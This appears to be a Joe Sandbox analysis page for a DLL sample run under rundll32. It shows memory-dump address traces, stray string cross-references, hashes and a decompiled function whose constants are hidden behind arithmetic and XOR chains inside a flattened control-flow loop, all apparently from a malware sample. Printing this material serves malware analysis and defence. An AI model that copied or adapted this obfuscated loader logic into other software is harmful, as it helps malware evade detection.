0x1001a997
0x1001a99f
0x1001a9aa
0x1001a9b5
0x1001a9bd
0x1001a9c8
0x1001a9dc
0x1001a9e3
0x1001a9eb
0x1001a9fd
0x1001aa04
0x1001aa08
0x1001aa0f
0x1001aa0f
0x1001aa15
0x00000000
0x00000000
0x1001aa1b
0x1001aa1b
0x1001ad25
0x1001ad2e
0x1001ad42
0x1001ad44
0x1001ad4c
0x1001ad4e
0x1001ad6d
0x1001ad72
0x1001ad75
0x1001ad79
0x1001ad7b
0x1001b009
0x1001ad81
0x1001ad81
0x00000000
0x1001ad81
0x1001ad7b
0x1001aa21
0x1001aa21
0x1001aa27
0x1001ab9d
0x1001aba3
0x1001acee
0x1001ad00
0x1001ad05
0x1001ad0a
0x1001ad12
0x00000000
0x1001aba9
0x1001aba9
0x1001abaf
0x1001ac60
0x1001ac76
0x1001acbb
0x1001acc2
0x1001acc7
0x1001accc
0x1001acd4
0x00000000
0x1001abb5
0x1001abb5
0x1001abbb
0x00000000
0x1001abc1
0x1001abc8
0x1001abd3
0x1001abd8
0x1001abd8
0x1001abd9
0x1001abdd
0x1001abde
0x1001abee
0x1001ac00
0x1001ac13
0x1001ac18
0x1001ac1b
0x1001ac20
0x1001ac21
0x1001ac24
0x1001ac27
0x1001ac27
0x1001ac27
0x1001ac2a
0x1001ac31
0x1001ac31
0x1001ac38
0x1001ac41
0x1001ac44
0x1001ac49
0x1001ac4d
0x00000000
0x1001ac4d
0x1001abbb
0x1001abaf
0x1001aa2d
0x1001aa2d
0x1001ab8b
0x1001ab90
0x1001ab93
0x00000000
0x1001aa33
0x1001aa39
0x1001ab5f
0x1001ab64
0x1001ab67
0x00000000
0x1001aa3f
0x1001aa45
0x1001ab2d
0x1001ab32
0x1001ab35
0x00000000
0x1001aa4b
0x1001aa51
0x1001aa76
0x1001aa7b
0x1001aad1
0x1001aaf0
0x1001aaf5
0x1001aaf8
0x1001aafd
0x1001aafd
0x1001ab01
0x1001ab01
0x00000000
0x1001aa53
0x1001aa53
0x1001aa59
0x1001afe1
0x1001afe1
0x1001afe7
0x00000000
0x1001aa0f
0x1001aa0f
0x1001aa0f
0x1001aa15
0x00000000
0x00000000
0x00000000
0x1001aa15
0x00000000
0x1001aa0f
0x00000000
0x00000000
0x1001afed
0x1001afed
0x1001aa5f
0x1001aa66
0x1001aa6b
0x1001aa70
0x1001aa70
0x1001aa0f
0x1001aa0f
0x1001aa15
0x00000000
0x00000000
0x00000000
0x1001aa15
0x1001aa0f
0x1001aa59
0x1001aa51
0x1001aa45
0x1001aa39
0x1001aa2d
0x1001aa27
0x1001b013
0x1001b01d
0x1001ad8b
0x1001ad8b
0x1001ad91
0x1001afd0
0x1001afd5
0x1001afd9
0x1001afdc
0x00000000
0x1001ad97
0x1001ad97
0x1001ad9d
0x1001afa2
0x1001afa9
0x00000000
0x1001ada3
0x1001ada3
0x1001ada9
0x1001af74
0x1001af7b
0x1001af7c
0x1001af84
0x00000000
0x1001adaf
0x1001adaf
0x1001adb5
0x1001af45
0x1001af47
0x1001af4e
0x1001af4f
0x1001af52
0x00000000
0x1001adbb
0x1001adbb
0x1001adc1
0x1001aed6
0x1001aedd
0x1001aeeb
0x1001af01
0x1001af08
0x1001af0d
0x1001af12
0x1001af1a
0x00000000
0x1001adc7
0x1001adc7
0x1001adcd
0x1001aebd
0x1001aec2
0x1001aec5
0x00000000
0x1001add3
0x1001add3
0x1001add9
0x00000000
0x1001addf
0x1001addf
0x1001ade4
0x1001ae56
0x1001ae78
0x1001ae82
0x1001ae85
0x1001ae91
0x00000000
0x1001ae91
0x1001add9
0x1001adcd
0x1001adc1
0x1001adb5
0x1001ada9
0x1001ad9d
0x00000000
0x1001ad91

Strings

"s, xrefs: 1001A38E
}G, xrefs: 1001A911
, xrefs: 10019F74
!", xrefs: 1001A984
H{, xrefs: 10019E25
8, xrefs: 1001A36D
dg, xrefs: 1001A491
)?, xrefs: 1001A676
#oJ9, xrefs: 1001ADD3
/, xrefs: 1001A3B7
}, xrefs: 1001A514
.v, xrefs: 10019F5A
b-, xrefs: 1001A53E
De, xrefs: 1001A841
d/<, xrefs: 1001AA53
}&, xrefs: 1001A3DE
l8, xrefs: 1001A0E4
DM, xrefs: 1001A5B1
%, xrefs: 1001A6A7
15, xrefs: 1001A054
2b, xrefs: 10019EDA
;d, xrefs: 1001A1BD
m, xrefs: 1001A07A
d/<, xrefs: 1001AC44

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$ $!"$"s$#oJ9$)?$.v$15$2b$8$;d$DM$De$H{$b-$d/<$d/<$dg$l8$m$}&$}G$}$%
API String ID: 0-2457962065
Opcode ID: b8df35f1196089bd07a24ea1b598622fca57a06b5ac65ee51d509657330a990c
Instruction ID: 976f8a73325060f499c1b6153de22724aa2fccf811286313bd7587404af29fef
Opcode Fuzzy Hash: b8df35f1196089bd07a24ea1b598622fca57a06b5ac65ee51d509657330a990c
Instruction Fuzzy Hash: 6292F2715093818FE378CF61C989B9BBBE1FBC5744F10891DE18A8A260D7B59989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10012965, Relevance: 26.8, Strings: 21, Instructions: 559
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10012965(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				void* _t616;
				void* _t617;
				signed int _t631;
				signed int _t636;
				signed int _t638;
				signed int _t643;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t675;
				void* _t676;
				void* _t681;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t737;
				void* _t739;
				void* _t740;
				void* _t742;

				_v1592 = __edx;
				_v1588 = __ecx;
				_v1600 = 0x81a2;
				_v1600 = _v1600 * 0x51;
				_t734 = 0x149dffe6;
				_v1600 = _v1600 ^ 0x0029046b;
				_v1820 = 0xa317;
				_t731 = 0x6d;
				_v1820 = _v1820 / _t731;
				_v1820 = _v1820 | 0xb0bf28c0;
				_v1820 = _v1820 << 8;
				_v1820 = _v1820 ^ 0xbf29f1c0;
				_v1644 = 0x87c;
				_v1644 = _v1644 << 4;
				_v1644 = _v1644 ^ 0x00008950;
				_v1656 = 0xaf72;
				_v1656 = _v1656 ^ 0xf8536856;
				_v1656 = _v1656 ^ 0xf853f78b;
				_v1720 = 0x2378;
				_t653 = 0x12;
				_v1720 = _v1720 * 0x77;
				_v1720 = _v1720 ^ 0x64312f2b;
				_v1720 = _v1720 ^ 0x642133c7;
				_v1804 = 0xea19;
				_v1804 = _v1804 + 0xffff5808;
				_v1804 = _v1804 << 0x10;
				_v1804 = _v1804 * 0x6f;
				_v1804 = _v1804 ^ 0xac4f53f6;
				_v1748 = 0x9778;
				_v1748 = _v1748 << 7;
				_v1748 = _v1748 ^ 0x598ba3f9;
				_v1748 = _v1748 + 0x8ff6;
				_v1748 = _v1748 ^ 0x59c0ab27;
				_v1664 = 0x881f;
				_v1664 = _v1664 >> 0xa;
				_v1664 = _v1664 | 0x5b999195;
				_v1664 = _v1664 ^ 0x5b999b93;
				_v1728 = 0x74b1;
				_v1728 = _v1728 ^ 0x6074f824;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 ^ 0x00031884;
				_v1628 = 0x3039;
				_v1628 = _v1628 / _t653;
				_v1628 = _v1628 ^ 0x00006384;
				_v1736 = 0xc64f;
				_t654 = 0x5c;
				_v1736 = _v1736 / _t654;
				_v1736 = _v1736 | 0xd5a0b868;
				_v1736 = _v1736 ^ 0xd5a0f550;
				_v1724 = 0xb856;
				_v1724 = _v1724 + 0x47b5;
				_v1724 = _v1724 * 0x2a;
				_v1724 = _v1724 ^ 0x002a3a18;
				_v1824 = 0x8351;
				_v1824 = _v1824 + 0x81f5;
				_v1824 = _v1824 + 0xe517;
				_v1824 = _v1824 << 2;
				_v1824 = _v1824 ^ 0x0007a51f;
				_v1740 = 0xf66b;
				_v1740 = _v1740 + 0xffff1308;
				_v1740 = _v1740 << 6;
				_v1740 = _v1740 ^ 0x0002750a;
				_v1792 = 0x9fd9;
				_v1792 = _v1792 + 0x4b8e;
				_v1792 = _v1792 + 0xffff2f9e;
				_v1792 = _v1792 >> 0xf;
				_v1792 = _v1792 ^ 0x00003a08;
				_v1800 = 0x966c;
				_v1800 = _v1800 ^ 0x8d45c2e0;
				_v1800 = _v1800 ^ 0x65a85158;
				_v1800 = _v1800 + 0xffff603c;
				_v1800 = _v1800 ^ 0xe8ec61cf;
				_v1716 = 0x4029;
				_t655 = 0x60;
				_v1716 = _v1716 / _t655;
				_v1716 = _v1716 ^ 0x86a261cb;
				_v1716 = _v1716 ^ 0x86a2059f;
				_v1808 = 0xe8e3;
				_v1808 = _v1808 / _t731;
				_v1808 = _v1808 + 0x483f;
				_v1808 = _v1808 ^ 0xbcef0a4e;
				_v1808 = _v1808 ^ 0xbcef6349;
				_v1816 = 0x6f91;
				_v1816 = _v1816 + 0xffff8468;
				_t732 = 0x34;
				_t656 = 0x29;
				_v1816 = _v1816 * 0x33;
				_v1816 = _v1816 << 7;
				_v1816 = _v1816 ^ 0xfecd495c;
				_v1640 = 0xa61;
				_v1640 = _v1640 >> 0xd;
				_v1640 = _v1640 ^ 0x00004d64;
				_v1648 = 0x609b;
				_v1648 = _v1648 + 0xae34;
				_v1648 = _v1648 ^ 0x00012005;
				_v1616 = 0x313f;
				_v1616 = _v1616 + 0xf40e;
				_v1616 = _v1616 ^ 0x0001621e;
				_v1680 = 0xad27;
				_v1680 = _v1680 ^ 0x11741994;
				_v1680 = _v1680 ^ 0x828bebc7;
				_v1680 = _v1680 ^ 0x93ff4a0d;
				_v1704 = 0x2eca;
				_v1704 = _v1704 << 3;
				_v1704 = _v1704 + 0xffff4fca;
				_v1704 = _v1704 ^ 0x0000afdc;
				_v1672 = 0xb5e9;
				_v1672 = _v1672 / _t732;
				_v1672 = _v1672 | 0x3cbbe239;
				_v1672 = _v1672 ^ 0x3cbbda4d;
				_v1760 = 0x653d;
				_v1760 = _v1760 ^ 0x5e29d2db;
				_v1760 = _v1760 / _t656;
				_v1760 = _v1760 * 0x30;
				_v1760 = _v1760 ^ 0x6e3d0fd3;
				_v1768 = 0xee4d;
				_v1768 = _v1768 + 0xffff4943;
				_v1768 = _v1768 * 0x23;
				_v1768 = _v1768 | 0x6650922d;
				_v1768 = _v1768 ^ 0x6657f47d;
				_v1620 = 0x4442;
				_v1620 = _v1620 << 0xa;
				_v1620 = _v1620 ^ 0x01114709;
				_v1752 = 0x70f3;
				_v1752 = _v1752 + 0xc573;
				_v1752 = _v1752 ^ 0x8bd692b9;
				_v1752 = _v1752 + 0x375f;
				_v1752 = _v1752 ^ 0x8bd7cab9;
				_v1692 = 0x8d49;
				_v1692 = _v1692 | 0xadf95343;
				_t657 = 0x6f;
				_v1692 = _v1692 / _t657;
				_v1692 = _v1692 ^ 0x01915aad;
				_v1608 = 0x9445;
				_v1608 = _v1608 ^ 0xfa8556cd;
				_v1608 = _v1608 ^ 0xfa8587ad;
				_v1596 = 0xa356;
				_v1596 = _v1596 ^ 0x020e3d0f;
				_v1596 = _v1596 ^ 0x020eaa39;
				_v1668 = 0x9fc9;
				_v1668 = _v1668 << 1;
				_v1668 = _v1668 + 0xffff5705;
				_v1668 = _v1668 ^ 0x0000873c;
				_v1676 = 0x5aa4;
				_t658 = 0x57;
				_v1676 = _v1676 * 0xd;
				_t659 = 0x74;
				_v1676 = _v1676 / _t658;
				_v1676 = _v1676 ^ 0x000044cc;
				_v1684 = 0x6a20;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 + 0xffff5b62;
				_v1684 = _v1684 ^ 0x000ca81d;
				_v1652 = 0xc97c;
				_v1652 = _v1652 >> 5;
				_v1652 = _v1652 ^ 0x00002e12;
				_v1696 = 0x481c;
				_v1696 = _v1696 << 5;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 ^ 0x81c0713e;
				_v1732 = 0x6e12;
				_v1732 = _v1732 + 0x239d;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 ^ 0x246bc9a9;
				_v1812 = 0x8d84;
				_v1812 = _v1812 << 7;
				_v1812 = _v1812 ^ 0x627ea561;
				_v1812 = _v1812 + 0xffffb69b;
				_v1812 = _v1812 ^ 0x623827c0;
				_v1612 = 0x2459;
				_v1612 = _v1612 * 0x5f;
				_v1612 = _v1612 ^ 0x000d4756;
				_v1780 = 0x3738;
				_v1780 = _v1780 >> 0xf;
				_v1780 = _v1780 + 0x7756;
				_t660 = 0x49;
				_v1780 = _v1780 / _t659;
				_v1780 = _v1780 ^ 0x00004d7c;
				_v1604 = 0xa6e8;
				_v1604 = _v1604 >> 0xb;
				_v1604 = _v1604 ^ 0x00007121;
				_v1700 = 0x3aaa;
				_v1700 = _v1700 * 0x35;
				_v1700 = _v1700 | 0x9258fa78;
				_v1700 = _v1700 ^ 0x925ce803;
				_v1776 = 0xc1a7;
				_v1776 = _v1776 | 0xe727275b;
				_t347 =  &_v1776; // 0xe727275b
				_v1776 =  *_t347 / _t660;
				_v1776 = _v1776 | 0x34b38de4;
				_v1776 = _v1776 ^ 0x37bb8fe4;
				_v1784 = 0x91c3;
				_t661 = 0x64;
				_v1784 = _v1784 / _t661;
				_v1784 = _v1784 + 0x788e;
				_v1784 = _v1784 / _t732;
				_v1784 = _v1784 ^ 0x000026f9;
				_v1756 = 0xe29b;
				_v1756 = _v1756 << 5;
				_v1756 = _v1756 >> 9;
				_t662 = 0x21;
				_v1756 = _v1756 / _t662;
				_v1756 = _v1756 ^ 0x00004ef7;
				_v1796 = 0x179;
				_v1796 = _v1796 + 0x7a5c;
				_v1796 = _v1796 | 0xddf9ffa6;
				_v1796 = _v1796 ^ 0xddf99719;
				_v1688 = 0xa45d;
				_t663 = 0x17;
				_v1688 = _v1688 / _t663;
				_v1688 = _v1688 ^ 0xa9b19ce5;
				_v1688 = _v1688 ^ 0xa9b19a72;
				_v1772 = 0x6fb4;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 >> 0xb;
				_v1772 = _v1772 >> 4;
				_v1772 = _v1772 ^ 0x0000531d;
				_v1636 = 0x1eab;
				_v1636 = _v1636 | 0x295ec68a;
				_v1636 = _v1636 ^ 0x295ec908;
				_v1712 = 0x5da6;
				_v1712 = _v1712 ^ 0x5fdaae01;
				_v1712 = _v1712 ^ 0xdf7664b8;
				_v1712 = _v1712 ^ 0x80ac9034;
				_v1764 = 0x8aec;
				_t664 = 0x4b;
				_v1764 = _v1764 / _t664;
				_t665 = 0x45;
				_v1764 = _v1764 * 0x5a;
				_v1764 = _v1764 * 0x7e;
				_v1764 = _v1764 ^ 0x0052267c;
				_v1788 = 0x22ed;
				_v1788 = _v1788 + 0xffffcd0d;
				_v1788 = _v1788 * 0x72;
				_v1788 = _v1788 << 0xc;
				_v1788 = _v1788 ^ 0x8dd516dd;
				_v1744 = 0x24eb;
				_v1744 = _v1744 ^ 0x0b5c0f43;
				_v1744 = _v1744 ^ 0xa1a0b70d;
				_v1744 = _v1744 / _t665;
				_v1744 = _v1744 ^ 0x027a3009;
				_v1624 = 0x7660;
				_v1624 = _v1624 ^ 0x00000e09;
				_v1632 = 0x758c;
				_v1632 = _v1632 << 0xa;
				_v1632 = _v1632 ^ 0x01d672ff;
				_v1660 = 0x7b50;
				_v1660 = _v1660 >> 1;
				_v1660 = _v1660 >> 3;
				_v1660 = _v1660 ^ 0x000037ef;
				_v1708 = 0x99fa;
				_v1708 = _v1708 ^ 0xe57d132d;
				_v1708 = _v1708 ^ 0x77fb962a;
				_v1708 = _v1708 ^ 0x92961cfd;
				_t616 = E100145F8();
				_t733 = _v1592;
				_t739 = _t616;
				_t651 = _v1592;
				while(1) {
					L1:
					_t617 = 0x2cd60113;
					do {
						while(1) {
							L2:
							_t742 = _t734 - 0x1e5e78f1;
							if(_t742 > 0) {
								break;
							}
							if(_t742 == 0) {
								_t636 = E1000D0DE(_v1584, _v1616, _v1680, _v1704, _v1672, _v1580);
								_t651 = _t636;
								_t740 = _t740 + 0x10;
								__eflags = _t636;
								_t617 = 0x2cd60113;
								_t734 =  !=  ? 0x2cd60113 : 0x12daf843;
								continue;
							}
							if(_t734 == 0x178ada5) {
								 *((intOrPtr*)(_t733 + 0x20)) = _v1588;
								_t638 =  *0x10021400; // 0x0
								 *(_t733 + 0x10) = _t638;
								 *0x10021400 = _t733;
								return _t638;
							}
							if(_t734 == 0x2a95541) {
								_t675 = _v1576;
								E100078F0(_t675, _v1636, _v1712, _v1764, _v1788);
								_t740 = _t740 + 0xc;
								_t734 = 0x178ada5;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							if(_t734 == 0x12daf843) {
								_t675 = _v1756;
								E100091CD(_t675, _v1796, _v1688, _v1584, _v1772);
								_t740 = _t740 + 0xc;
								_t734 = 0x2a95541;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							if(_t734 != 0x149dffe6) {
								if(_t734 == 0x178c8cba) {
									_push( &_v1044);
									E10002628(_v1588, _v1592);
									asm("sbb esi, esi");
									_t675 = 0x100012f8;
									_t737 = _t734 & 0x16fb7084;
									__eflags = _t737;
									L12:
									_t734 = _t737 + 0x22b4e350;
									while(1) {
										L1:
										_t617 = 0x2cd60113;
										goto L2;
									}
								} else {
									_t748 = _t734 - 0x1a9938f9;
									if(_t734 != 0x1a9938f9) {
										goto L28;
									} else {
										_push(_v1780);
										_push(1);
										_push( &_v524);
										_push(_t675);
										_push(_v1612);
										_push(_v1812);
										_t675 = _v1696;
										_push(0);
										_push(0);
										E100189F6(_t675, _v1732, _t748);
										_t740 = _t740 + 0x20;
										_t734 = 0x32f46056;
										while(1) {
											L1:
											_t617 = 0x2cd60113;
											goto L2;
										}
									}
								}
							}
							_t676 = 0x24;
							_t643 = E100157E8(_t676);
							_t733 = _t643;
							_t675 = _t675;
							__eflags = _t733;
							if(_t733 != 0) {
								_push(_t675);
								E10001D54(_v1720, _t675, _v1804, _v1748, _v1664,  &_v1564, _v1728, _v1600);
								_t740 = _t740 + 0x20;
								_t734 = 0x178c8cba;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							return _t643;
							L32:
						}
						__eflags = _t734 - 0x22b4e350;
						if(_t734 == 0x22b4e350) {
							E100091CD(_v1744, _v1624, _v1632, _t733, _v1660);
							_t740 = _t740 + 0xc;
							_t734 = 0xf568d32;
							_t617 = 0x2cd60113;
							goto L28;
						} else {
							__eflags = _t734 - 0x23197851;
							if(_t734 == 0x23197851) {
								E10011B71( &_v1576, _v1640,  &_v1584, _v1648);
								asm("sbb esi, esi");
								_t734 = (_t734 & 0x1bb523b0) + 0x2a95541;
								goto L1;
							} else {
								__eflags = _t734 - _t617;
								if(__eflags == 0) {
									_push(0x100013a8);
									_push(_v1620);
									E100164EC(_t651, __eflags, E1001BF25(_v1760, _v1768, __eflags), _v1752, 0x104,  &_v1044,  &_v1564, _v1692, _v1608, _v1596);
									E1001C5F7(_v1668, _v1676, _v1684, _v1652, _t622);
									_t740 = _t740 + 0x34;
									_t734 = 0x1a9938f9;
									while(1) {
										L1:
										_t617 = 0x2cd60113;
										goto L2;
									}
								} else {
									__eflags = _t734 - 0x32f46056;
									if(_t734 == 0x32f46056) {
										E100091CD(_v1604, _v1700, _v1776, _t651, _v1784);
										_t740 = _t740 + 0xc;
										_t734 = 0x12daf843;
										while(1) {
											L1:
											_t617 = 0x2cd60113;
											goto L2;
										}
									} else {
										__eflags = _t734 - 0x39b053d4;
										if(_t734 != 0x39b053d4) {
											goto L28;
										} else {
											_v1572 = E10009295();
											_t631 = E1001BBAB(_v1724, _v1824, _t630, _v1740);
											_pop(_t681);
											_v1568 = 2 + _t631 * 2;
											_t675 = _v1792;
											E1001C353(_t675, _v1708, _v1800, _t739,  &_v1576, _t681, _v1716, _t681, _t739, _t739, _v1808, _v1816);
											_t740 = _t740 + 0x28;
											asm("sbb esi, esi");
											_t737 = _t734 & 0x00649501;
											goto L12;
										}
									}
								}
							}
						}
						goto L32;
						L28:
						__eflags = _t734 - 0xf568d32;
					} while (__eflags != 0);
					return _t617;
				}
			}

0x1001296f
0x10012976
0x1001297d
0x10012990
0x10012997
0x1001299c
0x100129a7
0x100129b7
0x100129bc
0x100129c2
0x100129ca
0x100129cf
0x100129d7
0x100129e2
0x100129ea
0x100129f5
0x10012a00
0x10012a0b
0x10012a16
0x10012a29
0x10012a2c
0x10012a33
0x10012a3e
0x10012a49
0x10012a51
0x10012a59
0x10012a63
0x10012a67
0x10012a6f
0x10012a77
0x10012a7c
0x10012a84
0x10012a8c
0x10012a94
0x10012a9f
0x10012aa7
0x10012ab2
0x10012abd
0x10012ac5
0x10012acd
0x10012ad2
0x10012ada
0x10012af0
0x10012af7
0x10012b02
0x10012b0e
0x10012b11
0x10012b15
0x10012b1d
0x10012b25
0x10012b2d
0x10012b3a
0x10012b3e
0x10012b46
0x10012b4e
0x10012b56
0x10012b5e
0x10012b63
0x10012b6b
0x10012b73
0x10012b7b
0x10012b80
0x10012b8a
0x10012b92
0x10012b9a
0x10012ba2
0x10012ba7
0x10012baf
0x10012bb7
0x10012bbf
0x10012bc7
0x10012bcf
0x10012bd7
0x10012beb
0x10012bf0
0x10012bf7
0x10012c02
0x10012c0d
0x10012c1d
0x10012c23
0x10012c2b
0x10012c33
0x10012c3b
0x10012c43
0x10012c50
0x10012c53
0x10012c54
0x10012c58
0x10012c5d
0x10012c65
0x10012c70
0x10012c78
0x10012c83
0x10012c8e
0x10012c99
0x10012ca4
0x10012caf
0x10012cba
0x10012cc5
0x10012cd0
0x10012cdb
0x10012ce6
0x10012cf1
0x10012cfc
0x10012d04
0x10012d0f
0x10012d1a
0x10012d30
0x10012d37
0x10012d42
0x10012d4d
0x10012d55
0x10012d63
0x10012d6c
0x10012d70
0x10012d78
0x10012d80
0x10012d8d
0x10012d91
0x10012d99
0x10012da1
0x10012dac
0x10012db4
0x10012dbf
0x10012dc7
0x10012dd1
0x10012dd9
0x10012de1
0x10012de9
0x10012df4
0x10012e08
0x10012e0d
0x10012e16
0x10012e21
0x10012e2c
0x10012e37
0x10012e42
0x10012e4d
0x10012e58
0x10012e63
0x10012e6e
0x10012e75
0x10012e80
0x10012e8b
0x10012e9e
0x10012ea1
0x10012eb1
0x10012eb2
0x10012ebb
0x10012ec6
0x10012ed1
0x10012ed9
0x10012ee4
0x10012eef
0x10012efa
0x10012f02
0x10012f0d
0x10012f18
0x10012f20
0x10012f28
0x10012f33
0x10012f3b
0x10012f43
0x10012f48
0x10012f50
0x10012f58
0x10012f5d
0x10012f65
0x10012f6d
0x10012f75
0x10012f8a
0x10012f91
0x10012f9c
0x10012fa4
0x10012fa9
0x10012fb7
0x10012fb8
0x10012fbc
0x10012fc4
0x10012fcf
0x10012fd7
0x10012fe2
0x10012ff5
0x10012ffc
0x10013007
0x10013012
0x1001301a
0x10013024
0x1001302c
0x10013030
0x10013038
0x10013040
0x1001304e
0x10013053
0x10013057
0x10013067
0x1001306d
0x10013075
0x1001307d
0x10013082
0x1001308b
0x10013090
0x10013096
0x1001309e
0x100130a6
0x100130ae
0x100130b6
0x100130be
0x100130d0
0x100130d5
0x100130de
0x100130e9
0x100130f4
0x100130fc
0x10013101
0x10013106
0x1001310b
0x10013113
0x1001311e
0x10013129
0x10013134
0x1001313f
0x1001314a
0x10013155
0x10013160
0x1001316c
0x10013171
0x1001317c
0x1001317d
0x10013186
0x1001318a
0x10013192
0x1001319a
0x100131a7
0x100131ab
0x100131b0
0x100131b8
0x100131c0
0x100131c8
0x100131d6
0x100131da
0x100131e2
0x100131fb
0x10013206
0x10013211
0x10013219
0x10013224
0x1001322f
0x10013236
0x1001323e
0x10013249
0x10013254
0x1001325f
0x1001326a
0x10013279
0x1001327e
0x10013285
0x10013287
0x1001328e
0x1001328e
0x1001328e
0x10013293
0x10013293
0x10013293
0x10013293
0x10013299
0x00000000
0x00000000
0x1001329f
0x10013442
0x10013447
0x10013449
0x1001344c
0x10013453
0x10013458
0x00000000
0x10013458
0x100132ab
0x1001363d
0x10013640
0x10013645
0x10013648
0x00000000
0x10013648
0x100132b7
0x100133ff
0x10013406
0x1001340b
0x1001340e
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001328e
0x100132c3
0x100133d3
0x100133d7
0x100133dc
0x100133df
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001328e
0x100132cf
0x100132db
0x1001333c
0x10013342
0x1001334a
0x1001334c
0x1001334d
0x1001334d
0x10013353
0x10013353
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x100132dd
0x100132dd
0x100132e3
0x00000000
0x100132e9
0x100132e9
0x100132f4
0x100132f6
0x100132f7
0x100132f8
0x100132ff
0x1001330a
0x10013311
0x10013313
0x10013315
0x1001331a
0x1001331d
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001328e
0x100132e3
0x100132db
0x1001336f
0x10013370
0x10013375
0x10013377
0x10013378
0x1001337a
0x10013380
0x100133ab
0x100133b0
0x100133b3
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001328e
0x10013658
0x00000000
0x10013658
0x10013460
0x10013466
0x10013616
0x1001361b
0x1001361e
0x10013623
0x00000000
0x1001346c
0x1001346c
0x10013472
0x100135e0
0x100135e8
0x100135f1
0x00000000
0x10013478
0x10013478
0x1001347a
0x1001353c
0x10013541
0x1001358f
0x100135b1
0x100135b6
0x100135b9
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x10013480
0x10013480
0x10013486
0x1001352a
0x1001352f
0x10013532
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001348c
0x1001348c
0x10013492
0x00000000
0x10013498
0x100134b5
0x100134bc
0x100134c2
0x100134d2
0x100134f8
0x100134fc
0x10013501
0x10013506
0x10013508
0x00000000
0x10013508
0x10013492
0x10013486
0x1001347a
0x10013472
0x00000000
0x10013628
0x10013628
0x10013628
0x00000000
0x10013293

Strings

", xrefs: 10013192
M, xrefs: 10012D78
7, xrefs: 1001323E
Y$, xrefs: 10012F75
_7, xrefs: 10012DD9
=e, xrefs: 10012D4D
)@, xrefs: 10012BD7
?1, xrefs: 10012CA4
dM, xrefs: 10012C78
j, xrefs: 10012EC6
`v, xrefs: 100131E2
?H, xrefs: 10012C23
['', xrefs: 10013024
\z, xrefs: 100130A6
BD, xrefs: 10012DA1
!q, xrefs: 10012FD7
|&R, xrefs: 1001318A
VG, xrefs: 10012F91
|M, xrefs: 10012FBC
+/1d, xrefs: 10012A33
$, xrefs: 100131B8

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: j$!q$)@$+/1d$=e$?1$?H$BD$M$VG$Y$$[''$\z$_7$`v$dM$|&R$|M$"$$$7
API String ID: 1514166925-3565163747
Opcode ID: 9163a8007b0dceb48b04801531080e3a121e2b3b0e415cdbf67a5b480fcb8054
Instruction ID: 2b517cf3c11194d57aa6f79e2f665a47e465c6b4f990833d55609906dbc9d50d
Opcode Fuzzy Hash: 9163a8007b0dceb48b04801531080e3a121e2b3b0e415cdbf67a5b480fcb8054
Instruction Fuzzy Hash: 57520F715083818FE3B8CF61C54AB8BBBE1BBC4704F10891DE5D98A2A0D7B59949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10004EA1, Relevance: 24.1, Strings: 19, Instructions: 375
COMMONCrypto

Download Yara Rule

